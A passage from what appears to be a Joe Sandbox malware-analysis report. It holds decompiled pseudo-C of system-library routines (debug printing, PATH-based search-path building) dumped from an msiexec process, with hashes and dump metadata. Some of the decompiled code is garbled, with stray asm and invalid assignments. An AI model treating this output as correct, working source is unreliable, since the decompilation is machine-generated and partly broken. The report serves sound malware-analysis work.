                              							_t83 =  *0x4df8628; // 0x0
                              							_t116 =  *0x4df862c; // 0x0
                              							_v76 = _t116;
                              							_t117 = _v68;
                              						} while (_t117 != _t83 || _v64 != _v76);
                              						asm("sbb edx, [esp+0x24]");
                              						_t102 = _t100 - _v60 - _t117;
                              						_t112 = _v48;
                              						_t91 = _v44;
                              						asm("sbb edx, eax");
                              						_t130 = _t105 - _v52;
                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                              							_t88 = _t102 - _t91;
                              							asm("sbb edx, edi");
                              							_t108 = _t105;
                              						} else {
                              							_t88 = 0;
                              							_t108 = 0;
                              						}
                              						goto L16;
                              					}
                              				} else {
                              					if( *(_t112 + 0x44) == _t60) {
                              						goto L20;
                              					}
                              					goto L3;
                              				}
                              			}
                              0x04d2bb14
                              0x04d2bb16
                              0x04d2bb16
                              0x00000000
                              0x04d2ba7c
                              0x04d2bb0a
                              0x04d2bb0d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d2bb0f

                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2B9A5
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 885266447-0
                              • Opcode ID: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
                              • Instruction ID: 46f0b79e9de602a52150e59dfd49843cc9b0535ef07c3b7d385b6cb9e73c39e0
                              • Opcode Fuzzy Hash: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
                              • Instruction Fuzzy Hash: 4B514671A08360DFC720DF29C68092ABBE5FB98708F14496EF99587344E7B1F944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E04D0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                              				signed int _t65;
                              				signed short _t69;
                              				intOrPtr _t70;
                              				signed short _t85;
                              				void* _t86;
                              				signed short _t89;
                              				signed short _t91;
                              				intOrPtr _t92;
                              				intOrPtr _t97;
                              				intOrPtr* _t98;
                              				signed short _t99;
                              				signed short _t101;
                              				void* _t102;
                              				char* _t103;
                              				signed short _t104;
                              				intOrPtr* _t110;
                              				void* _t111;
                              				void* _t114;
                              				intOrPtr* _t115;
                              
                              				_t109 = __esi;
                              				_t108 = __edi;
                              				_t106 = __edx;
                              				_t95 = __ebx;
                              				_push(0x90);
                              				_push(0x4ddf7a8);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                              				if(__edx == 0xffffffff) {
                              					L6:
                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                              					__eflags = _t65 & 0x00000002;
                              					if((_t65 & 0x00000002) != 0) {
                              						L3:
                              						L4:
                              						return E04D5D130(_t95, _t108, _t109);
                              					}
                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                              					_t108 = 0;
                              					_t109 = 0;
                              					_t95 = 0;
                              					__eflags = 0;
                              					while(1) {
                              						__eflags = _t95 - 0x200;
                              						if(_t95 >= 0x200) {
                              							break;
                              						}
                              						E04D4D000(0x80);
                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                              						_t108 = _t115;
                              						_t95 = _t95 - 0xffffff80;
                              						_t17 = _t114 - 4;
                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                              						__eflags =  *_t17;
                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                              						_t102 = _t110 + 1;
                              						do {
                              							_t85 =  *_t110;
                              							_t110 = _t110 + 1;
                              							__eflags = _t85;
                              						} while (_t85 != 0);
                              						_t111 = _t110 - _t102;
                              						_t21 = _t95 - 1; // -129
                              						_t86 = _t21;
                              						__eflags = _t111 - _t86;
                              						if(_t111 > _t86) {
                              							_t111 = _t86;
                              						}
                              						E04D4F3E0(_t108, _t106, _t111);
                              						_t115 = _t115 + 0xc;
                              						_t103 = _t111 + _t108;
                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                              						_t89 = _t95 - _t111;
                              						__eflags = _t89;
                              						_push(0);
                              						if(_t89 == 0) {
                              							L15:
                              							_t109 = 0xc000000d;
                              							goto L16;
                              						} else {
                              							__eflags = _t89 - 0x7fffffff;
                              							if(_t89 <= 0x7fffffff) {
                              								L16:
                              								 *(_t114 - 0x94) = _t109;
                              								__eflags = _t109;
                              								if(_t109 < 0) {
                              									__eflags = _t89;
                              									if(_t89 != 0) {
                              										 *_t103 = 0;
                              									}
                              									L26:
                              									 *(_t114 - 0xa0) = _t109;
                              									 *(_t114 - 4) = 0xfffffffe;
                              									__eflags = _t109;
                              									if(_t109 >= 0) {
                              										L31:
                              										_t98 = _t108;
                              										_t39 = _t98 + 1; // 0x1
                              										_t106 = _t39;
                              										do {
                              											_t69 =  *_t98;
                              											_t98 = _t98 + 1;
                              											__eflags = _t69;
                              										} while (_t69 != 0);
                              										_t99 = _t98 - _t106;
                              										__eflags = _t99;
                              										L34:
                              										_t70 =  *[fs:0x30];
                              										__eflags =  *((char*)(_t70 + 2));
                              										if( *((char*)(_t70 + 2)) != 0) {
                              											L40:
                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                              											 *(_t114 - 4) = 1;
                              											_push(_t114 - 0x74);
                              											L04D5DEF0(_t99, _t106);
                              											 *(_t114 - 4) = 0xfffffffe;
                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                              											goto L3;
                              										}
                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                              											goto L40;
                              										}
                              										_push( *((intOrPtr*)(_t114 + 8)));
                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                              										_push(_t99 & 0x0000ffff);
                              										_push(_t108);
                              										_push(1);
                              										_t101 = E04D4B280();
                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                              										if( *((char*)(_t114 + 0x14)) == 1) {
                              											__eflags = _t101 - 0x80000003;
                              											if(_t101 == 0x80000003) {
                              												E04D4B7E0(1);
                              												_t101 = 0;
                              												__eflags = 0;
                              											}
                              										}
                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                              										goto L4;
                              									}
                              									__eflags = _t109 - 0x80000005;
                              									if(_t109 == 0x80000005) {
                              										continue;
                              									}
                              									break;
                              								}
                              								 *(_t114 - 0x90) = 0;
                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                              								_t91 = E04D4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                              								_t115 = _t115 + 0x10;
                              								_t104 = _t91;
                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                              								__eflags = _t104;
                              								if(_t104 < 0) {
                              									L21:
                              									_t109 = 0x80000005;
                              									 *(_t114 - 0x90) = 0x80000005;
                              									L22:
                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                              									L23:
                              									 *(_t114 - 0x94) = _t109;
                              									goto L26;
                              								}
                              								__eflags = _t104 - _t92;
                              								if(__eflags > 0) {
                              									goto L21;
                              								}
                              								if(__eflags == 0) {
                              									goto L22;
                              								}
                              								goto L23;
                              							}
                              							goto L15;
                              						}
                              					}
                              					__eflags = _t109;
                              					if(_t109 >= 0) {
                              						goto L31;
                              					}
                              					__eflags = _t109 - 0x80000005;
                              					if(_t109 != 0x80000005) {
                              						goto L31;
                              					}
                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                              					_t38 = _t95 - 1; // -129
                              					_t99 = _t38;
                              					goto L34;
                              				}
                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                              					__eflags = __edx - 0x65;
                              					if(__edx != 0x65) {
                              						goto L2;
                              					}
                              					goto L6;
                              				}
                              				L2:
                              				_push( *((intOrPtr*)(_t114 + 8)));
                              				_push(_t106);
                              				if(E04D4A890() != 0) {
                              					goto L6;
                              				}
                              				goto L3;
                              			}


                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: _vswprintf_s
                              • String ID:
                              • API String ID: 677850445-0
                              • Opcode ID: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
                              • Instruction ID: 2ed2b74afff38f243c068440465fe05d7ba6de204eff07e7ffde6dbf85e3db5c
                              • Opcode Fuzzy Hash: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
                              • Instruction Fuzzy Hash: 6C51E071E002598FEF35CF64C844BAEBBB1FF41714F1081AED85AAB281D770A9458B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E04D32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                              				signed int _v8;
                              				signed int _v16;
                              				unsigned int _v24;
                              				void* _v28;
                              				signed int _v32;
                              				unsigned int _v36;
                              				signed int _v37;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				intOrPtr _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				signed int _v72;
                              				signed int _v76;
                              				signed int _v80;
                              				signed int _t225;
                              				signed int _t229;
                              				signed int _t244;
                              				signed int _t246;
                              				intOrPtr _t248;
                              				signed int _t251;
                              				signed int _t258;
                              				signed int _t261;
                              				signed int _t269;
                              				signed int _t275;
                              				signed int _t277;
                              				void* _t288;
                              				void* _t289;
                              				signed int _t290;
                              				unsigned int _t293;
                              				signed int _t297;
                              				signed int _t299;
                              				signed int _t303;
                              				intOrPtr _t315;
                              				signed int _t324;
                              				signed int _t326;
                              				signed int _t327;
                              				signed int _t331;
                              				signed int _t332;
                              				signed int _t334;
                              				signed int _t336;
                              				signed int _t338;
                              				void* _t339;
                              				void* _t341;
                              
                              				_t336 = _t338;
                              				_t339 = _t338 - 0x4c;
                              				_v8 =  *0x4dfd360 ^ _t336;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t331 = 0x4dfb2e8;
                              				_v56 = _a4;
                              				_v48 = __edx;
                              				_v60 = __ecx;
                              				_t293 = 0;
                              				_v80 = 0;
                              				asm("movsd");
                              				_v64 = 0;
                              				_v76 = 0;
                              				_v72 = 0;
                              				asm("movsd");
                              				_v44 = 0;
                              				_v52 = 0;
                              				_v68 = 0;
                              				asm("movsd");
                              				_v32 = 0;
                              				_v36 = 0;
                              				asm("movsd");
                              				_v16 = 0;
                              				_t275 = 0x48;
                              				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                              				_t324 = 0;
                              				_v37 = _t313;
                              				if(_v48 <= 0) {
                              					L16:
                              					_t45 = _t275 - 0x48; // 0x0
                              					__eflags = _t45 - 0xfffe;
                              					if(_t45 > 0xfffe) {
                              						_t332 = 0xc0000106;
                              						goto L32;
                              					} else {
                              						_t331 = L04D24620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                              						_v52 = _t331;
                              						__eflags = _t331;
                              						if(_t331 == 0) {
                              							_t332 = 0xc0000017;
                              							goto L32;
                              						} else {
                              							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
                              							_t50 = _t331 + 0x48; // 0x48
                              							_t326 = _t50;
                              							_t313 = _v32;
                              							 *(_t331 + 0x3c) = _t275;
                              							_t277 = 0;
                              							 *((short*)(_t331 + 0x30)) = _v48;
                              							__eflags = _t313;
                              							if(_t313 != 0) {
                              								 *(_t331 + 0x18) = _t326;
                              								__eflags = _t313 - 0x4df8478;
                              								 *_t331 = ((0 | _t313 == 0x04df8478) - 0x00000001 & 0xfffffffb) + 7;
                              								E04D4F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
                              								_t313 = _v32;
                              								_t339 = _t339 + 0xc;
                              								_t277 = 1;
                              								__eflags = _a8;
                              								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
                              								if(_a8 != 0) {
                              									_t269 = E04D939F2(_t326);
                              									_t313 = _v32;
                              									_t326 = _t269;
                              								}
                              							}
                              							_t297 = 0;
                              							_v16 = 0;
                              							__eflags = _v48;
                              							if(_v48 <= 0) {
                              								L31:
                              								_t332 = _v68;
                              								__eflags = 0;
                              								 *((short*)(_t326 - 2)) = 0;
                              								goto L32;
                              							} else {
                              								_t275 = _t331 + _t277 * 4;
                              								_v56 = _t275;
                              								do {
                              									__eflags = _t313;
                              									if(_t313 != 0) {
                              										_t225 =  *(_v60 + _t297 * 4);
                              										__eflags = _t225;
                              										if(_t225 == 0) {
                              											goto L30;
                              										} else {
                              											__eflags = _t225 == 5;
                              											if(_t225 == 5) {
                              												goto L30;
                              											} else {
                              												goto L22;
                              											}
                              										}
                              									} else {
                              										L22:
                              										 *_t275 =  *(_v60 + _t297 * 4);
                              										 *(_t275 + 0x18) = _t326;
                              										_t229 =  *(_v60 + _t297 * 4);
                              										__eflags = _t229 - 8;
                              										if(_t229 > 8) {
                              											goto L56;
                              										} else {
                              											switch( *((intOrPtr*)(_t229 * 4 +  &M04D32959))) {
                              												case 0:
                              													__ax =  *0x4df8488;
                              													__eflags = __ax;
                              													if(__ax == 0) {
                              														goto L29;
                              													} else {
                              														__ax & 0x0000ffff = E04D4F3E0(__edi,  *0x4df848c, __ax & 0x0000ffff);
                              														__eax =  *0x4df8488 & 0x0000ffff;
                              														goto L26;
                              													}
                              													goto L108;
                              												case 1:
                              													L45:
                              													E04D4F3E0(_t326, _v80, _v64);
                              													_t264 = _v64;
                              													goto L26;
                              												case 2:
                              													 *0x4df8480 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df8484,  *0x4df8480 & 0x0000ffff);
                              													__eax =  *0x4df8480 & 0x0000ffff;
                              													__eax = ( *0x4df8480 & 0x0000ffff) >> 1;
                              													__edi = __edi + __eax * 2;
                              													goto L28;
                              												case 3:
                              													__eax = _v44;
                              													__eflags = __eax;
                              													if(__eax == 0) {
                              														goto L29;
                              													} else {
                              														__esi = __eax + __eax;
                              														__eax = E04D4F3E0(__edi, _v72, __esi);
                              														__edi = __edi + __esi;
                              														__esi = _v52;
                              														goto L27;
                              													}
                              													goto L108;
                              												case 4:
                              													_push(0x2e);
                              													_pop(__eax);
                              													 *(__esi + 0x44) = __edi;
                              													 *__edi = __ax;
                              													__edi = __edi + 4;
                              													_push(0x3b);
                              													_pop(__eax);
                              													 *(__edi - 2) = __ax;
                              													goto L29;
                              												case 5:
                              													__eflags = _v36;
                              													if(_v36 == 0) {
                              														goto L45;
                              													} else {
                              														E04D4F3E0(_t326, _v76, _v36);
                              														_t264 = _v36;
                              													}
                              													L26:
                              													_t339 = _t339 + 0xc;
                              													_t326 = _t326 + (_t264 >> 1) * 2 + 2;
                              													__eflags = _t326;
                              													L27:
                              													_push(0x3b);
                              													_pop(_t266);
                              													 *((short*)(_t326 - 2)) = _t266;
                              													goto L28;
                              												case 6:
                              													__ebx =  *0x4df575c;
                              													__eflags = __ebx - 0x4df575c;
                              													if(__ebx != 0x4df575c) {
                              														_push(0x3b);
                              														_pop(__esi);
                              														do {
                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                              															E04D4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                              															__edi = __edi + __eax * 2;
                              															__edi = __edi + 2;
                              															 *(__edi - 2) = __si;
                              															__ebx =  *__ebx;
                              															__eflags = __ebx - 0x4df575c;
                              														} while (__ebx != 0x4df575c);
                              														__esi = _v52;
                              														__ecx = _v16;
                              														__edx = _v32;
                              													}
                              													__ebx = _v56;
                              													goto L29;
                              												case 7:
                              													 *0x4df8478 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df847c,  *0x4df8478 & 0x0000ffff);
                              													__eax =  *0x4df8478 & 0x0000ffff;
                              													__eax = ( *0x4df8478 & 0x0000ffff) >> 1;
                              													__eflags = _a8;
                              													__edi = __edi + __eax * 2;
                              													if(_a8 != 0) {
                              														__ecx = __edi;
                              														__eax = E04D939F2(__ecx);
                              														__edi = __eax;
                              													}
                              													goto L28;
                              												case 8:
                              													__eax = 0;
                              													 *(__edi - 2) = __ax;
                              													 *0x4df6e58 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df6e5c,  *0x4df6e58 & 0x0000ffff);
                              													 *(__esi + 0x38) = __edi;
                              													__eax =  *0x4df6e58 & 0x0000ffff;
                              													__eax = ( *0x4df6e58 & 0x0000ffff) >> 1;
                              													__edi = __edi + __eax * 2;
                              													__edi = __edi + 2;
                              													L28:
                              													_t297 = _v16;
                              													_t313 = _v32;
                              													L29:
                              													_t275 = _t275 + 4;
                              													__eflags = _t275;
                              													_v56 = _t275;
                              													goto L30;
                              											}
                              										}
                              									}
                              									goto L108;
                              									L30:
                              									_t297 = _t297 + 1;
                              									_v16 = _t297;
                              									__eflags = _t297 - _v48;
                              								} while (_t297 < _v48);
                              								goto L31;
                              							}
                              						}
                              					}
                              				} else {
                              					while(1) {
                              						L1:
                              						_t229 =  *(_v60 + _t324 * 4);
                              						if(_t229 > 8) {
                              							break;
                              						}
                              						switch( *((intOrPtr*)(_t229 * 4 +  &M04D32935))) {
                              							case 0:
                              								__ax =  *0x4df8488;
                              								__eflags = __ax;
                              								if(__ax != 0) {
                              									__eax = __ax & 0x0000ffff;
                              									__ebx = __ebx + 2;
                              									__eflags = __ebx;
                              									goto L53;
                              								}
                              								goto L14;
                              							case 1:
                              								L44:
                              								_t313 =  &_v64;
                              								_v80 = E04D32E3E(0,  &_v64);
                              								_t275 = _t275 + _v64 + 2;
                              								goto L13;
                              							case 2:
                              								__eax =  *0x4df8480 & 0x0000ffff;
                              								__ebx = __ebx + __eax;
                              								__eflags = __dl;
                              								if(__dl != 0) {
                              									__eax = 0x4df8480;
                              									goto L80;
                              								}
                              								goto L14;
                              							case 3:
                              								__eax = E04D1EEF0(0x4df79a0);
                              								__eax =  &_v44;
                              								_push(__eax);
                              								_push(0);
                              								_push(0);
                              								_push(4);
                              								_push(L"PATH");
                              								_push(0);
                              								L57();
                              								__esi = __eax;
                              								_v68 = __esi;
                              								__eflags = __esi - 0xc0000023;
                              								if(__esi != 0xc0000023) {
                              									L10:
                              									__eax = E04D1EB70(__ecx, 0x4df79a0);
                              									__eflags = __esi - 0xc0000100;
                              									if(__esi == 0xc0000100) {
                              										_v44 = _v44 & 0x00000000;
                              										__eax = 0;
                              										_v68 = 0;
                              										goto L13;
                              									} else {
                              										__eflags = __esi;
                              										if(__esi < 0) {
                              											L32:
                              											_t203 = _v72;
                              											__eflags = _t203;
                              											if(_t203 != 0) {
                              												L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t203);
                              											}
                              											_t204 = _v52;
                              											__eflags = _t204;
                              											if(_t204 != 0) {
                              												__eflags = _t332;
                              												if(_t332 < 0) {
                              													L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
                              													_t204 = 0;
                              												}
                              											}
                              											goto L36;
                              										} else {
                              											__eax = _v44;
                              											__ebx = __ebx + __eax * 2;
                              											__ebx = __ebx + 2;
                              											__eflags = __ebx;
                              											L13:
                              											_t293 = _v36;
                              											goto L14;
                              										}
                              									}
                              								} else {
                              									__eax = _v44;
                              									__ecx =  *0x4df7b9c; // 0x0
                              									_v44 + _v44 =  *[fs:0x30];
                              									__ecx = __ecx + 0x180000;
                              									__eax = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                              									_v72 = __eax;
                              									__eflags = __eax;
                              									if(__eax == 0) {
                              										__eax = E04D1EB70(__ecx, 0x4df79a0);
                              										__eax = _v52;
                              										L36:
                              										_pop(_t325);
                              										_pop(_t333);
                              										__eflags = _v8 ^ _t336;
                              										_pop(_t276);
                              										return E04D4B640(_t204, _t276, _v8 ^ _t336, _t313, _t325, _t333);
                              									} else {
                              										__ecx =  &_v44;
                              										_push(__ecx);
                              										_push(_v44);
                              										_push(__eax);
                              										_push(4);
                              										_push(L"PATH");
                              										_push(0);
                              										L57();
                              										__esi = __eax;
                              										_v68 = __eax;
                              										goto L10;
                              									}
                              								}
                              								goto L108;
                              							case 4:
                              								__ebx = __ebx + 4;
                              								goto L14;
                              							case 5:
                              								_t271 = _v56;
                              								if(_v56 != 0) {
                              									_t313 =  &_v36;
                              									_t273 = E04D32E3E(_t271,  &_v36);
                              									_t293 = _v36;
                              									_v76 = _t273;
                              								}
                              								if(_t293 == 0) {
                              									goto L44;
                              								} else {
                              									_t275 = _t275 + 2 + _t293;
                              								}
                              								goto L14;
                              							case 6:
                              								__eax =  *0x4df5764 & 0x0000ffff;
                              								goto L53;
                              							case 7:
                              								__eax =  *0x4df8478 & 0x0000ffff;
                              								__ebx = __ebx + __eax;
                              								__eflags = _a8;
                              								if(_a8 != 0) {
                              									__ebx = __ebx + 0x16;
                              									__ebx = __ebx + __eax;
                              								}
                              								__eflags = __dl;
                              								if(__dl != 0) {
                              									__eax = 0x4df8478;
                              									L80:
                              									_v32 = __eax;
                              								}
                              								goto L14;
                              							case 8:
                              								__eax =  *0x4df6e58 & 0x0000ffff;
                              								__eax = ( *0x4df6e58 & 0x0000ffff) + 2;
                              								L53:
                              								__ebx = __ebx + __eax;
                              								L14:
                              								_t324 = _t324 + 1;
                              								if(_t324 >= _v48) {
                              									goto L16;
                              								} else {
                              									_t313 = _v37;
                              									goto L1;
                              								}
                              								goto L108;
                              						}
                              					}
                              					L56:
                              					asm("int 0x29");
                              					asm("out 0x28, al");
                              					asm("rol dword [esi], cl");
                              					asm("daa");
                              					asm("rol dword [esi+ebp], cl");
                              					asm("rol dword [es:esi+eax*2], cl");
                              					asm("rol dword [es:edi+ebx], cl");
                              					asm("xlatb");
                              					asm("xlatb");
                              					asm("daa");
                              					asm("rol dword [esi+ebx], cl");
                              					asm("daa");
                              					asm("rol dword [eax+ebx*8], cl");
                              					_t288 = 0x25;
                              					asm("xlatb");
                              					_t289 = _t288 - _t313;
                              					_pop(_t341);
                              					asm("xlatb");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					_push(0x20);
                              					_push(0x4ddff00);
                              					E04D5D08C(_t289, _t326, _t331);
                              					_v44 =  *[fs:0x18];
                              					_t327 = 0;
                              					 *_a24 = 0;
                              					_t290 = _a12;
                              					__eflags = _t290;
                              					if(_t290 == 0) {
                              						_t244 = 0xc0000100;
                              					} else {
                              						_v8 = 0;
                              						_t334 = 0xc0000100;
                              						_v52 = 0xc0000100;
                              						_t246 = 4;
                              						while(1) {
                              							_v40 = _t246;
                              							__eflags = _t246;
                              							if(_t246 == 0) {
                              								break;
                              							}
                              							_t303 = _t246 * 0xc;
                              							_v48 = _t303;
                              							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x4ce1664));
                              							if(__eflags <= 0) {
                              								if(__eflags == 0) {
                              									_t261 = E04D4E5C0(_a8,  *((intOrPtr*)(_t303 + 0x4ce1668)), _t290);
                              									_t341 = _t341 + 0xc;
                              									__eflags = _t261;
                              									if(__eflags == 0) {
                              										_t334 = E04D851BE(_t290,  *((intOrPtr*)(_v48 + 0x4ce166c)), _a16, _t327, _t334, __eflags, _a20, _a24);
                              										_v52 = _t334;
                              										break;
                              									} else {
                              										_t246 = _v40;
                              										goto L62;
                              									}
                              									goto L70;
                              								} else {
                              									L62:
                              									_t246 = _t246 - 1;
                              									continue;
                              								}
                              							}
                              							break;
                              						}
                              						_v32 = _t334;
                              						__eflags = _t334;
                              						if(_t334 < 0) {
                              							__eflags = _t334 - 0xc0000100;
                              							if(_t334 == 0xc0000100) {
                              								_t299 = _a4;
                              								__eflags = _t299;
                              								if(_t299 != 0) {
                              									_v36 = _t299;
                              									__eflags =  *_t299 - _t327;
                              									if( *_t299 == _t327) {
                              										_t334 = 0xc0000100;
                              										goto L76;
                              									} else {
                              										_t315 =  *((intOrPtr*)(_v44 + 0x30));
                              										_t248 =  *((intOrPtr*)(_t315 + 0x10));
                              										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t299;
                              										if( *((intOrPtr*)(_t248 + 0x48)) == _t299) {
                              											__eflags =  *(_t315 + 0x1c);
                              											if( *(_t315 + 0x1c) == 0) {
                              												L106:
                              												_t334 = E04D32AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
                              												_v32 = _t334;
                              												__eflags = _t334 - 0xc0000100;
                              												if(_t334 != 0xc0000100) {
                              													goto L69;
                              												} else {
                              													_t327 = 1;
                              													_t299 = _v36;
                              													goto L75;
                              												}
                              											} else {
                              												_t251 = E04D16600( *(_t315 + 0x1c));
                              												__eflags = _t251;
                              												if(_t251 != 0) {
                              													goto L106;
                              												} else {
                              													_t299 = _a4;
                              													goto L75;
                              												}
                              											}
                              										} else {
                              											L75:
                              											_t334 = E04D32C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
                              											L76:
                              											_v32 = _t334;
                              											goto L69;
                              										}
                              									}
                              									goto L108;
                              								} else {
                              									E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              									_v8 = 1;
                              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                              									_t334 = _a24;
                              									_t258 = E04D32AE4( &_v36, _a8, _t290, _a16, _a20, _t334);
                              									_v32 = _t258;
                              									__eflags = _t258 - 0xc0000100;
                              									if(_t258 == 0xc0000100) {
                              										_v32 = E04D32C50(_v36, _a8, _t290, _a16, _a20, _t334, 1);
                              									}
                              									_v8 = _t327;
                              									E04D32ACB();
                              								}
                              							}
                              						}
                              						L69:
                              						_v8 = 0xfffffffe;
                              						_t244 = _t334;
                              					}
                              					L70:
                              					return E04D5D0D1(_t244);
                              				}
                              				L108:
                              			}
                              0x04d3285a
                              0x04d3285c
                              0x04d3285d
                              0x00000000
                              0x00000000
                              0x04d3275d
                              0x04d32761
                              0x00000000
                              0x04d32767
                              0x04d3276e
                              0x04d32773
                              0x04d32773
                              0x04d32776
                              0x04d32778
                              0x04d3277e
                              0x04d3277e
                              0x04d32781
                              0x04d32781
                              0x04d32783
                              0x04d32784
                              0x00000000
                              0x00000000
                              0x04d75bd8
                              0x04d75bde
                              0x04d75be4
                              0x04d75be6
                              0x04d75be8
                              0x04d75be9
                              0x04d75bee
                              0x04d75bf8
                              0x04d75bff
                              0x04d75c01
                              0x04d75c04
                              0x04d75c07
                              0x04d75c0b
                              0x04d75c0d
                              0x04d75c0d
                              0x04d75c15
                              0x04d75c18
                              0x04d75c1b
                              0x04d75c1b
                              0x04d75c1e
                              0x00000000
                              0x00000000
                              0x04d328c3
                              0x04d328c8
                              0x04d328d2
                              0x04d328d4
                              0x04d328d8
                              0x04d328db
                              0x04d75c26
                              0x04d75c28
                              0x04d75c2d
                              0x04d75c2d
                              0x00000000
                              0x00000000
                              0x04d75c34
                              0x04d75c36
                              0x04d75c49
                              0x04d75c4e
                              0x04d75c54
                              0x04d75c5b
                              0x04d75c5d
                              0x04d75c60
                              0x04d32788
                              0x04d32788
                              0x04d3278b
                              0x04d3278e
                              0x04d3278e
                              0x04d3278e
                              0x04d32791
                              0x00000000
                              0x00000000
                              0x04d32756
                              0x04d32750
